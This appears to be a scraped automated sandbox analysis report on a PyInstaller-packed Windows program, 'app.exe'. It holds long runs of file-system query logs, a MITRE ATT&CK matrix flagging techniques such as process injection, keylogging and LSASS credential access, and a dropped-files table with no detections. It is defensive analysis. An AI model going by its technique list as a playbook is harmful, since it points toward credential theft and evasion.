    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\altgraph-0.17.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\dnspython-2.2.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pyinstaller-5.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pyinstaller-5.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\altgraph-0.17.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\altgraph-0.17.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\dnspython-2.2.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pyinstaller-5.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pywintypes38.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_umath.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_tests.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg\_umath_linalg.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft\_pocketfft_internal.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\mtrand.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\bit_generator.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_common.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_bounded_integers.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_mt19937.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_philox.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_pcg64.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\_brotli.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\backend_c.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE8B4C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7ACE8B4C0
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA4D50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7ACEA4D50
    Source: C:\Users\user\Desktop\app.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API    		1
    DLL Side-Loading    		11
    Process Injection    		11
    Process Injection    		11
    Input Capture    		2
    System Time Discovery    		Remote Services11
    Input Capture    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory21
    Security Software Discovery    		Remote Desktop Protocol1
    Archive Collected Data    		11
    Non-Standard Port    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
    Obfuscated Files or Information    		Security Account Manager1
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Timestomp    		NTDS35
    System Information Discovery    		Distributed Component Object ModelInput Capture1
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA SecretsInternet Connection DiscoverySSHKeylogging11
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
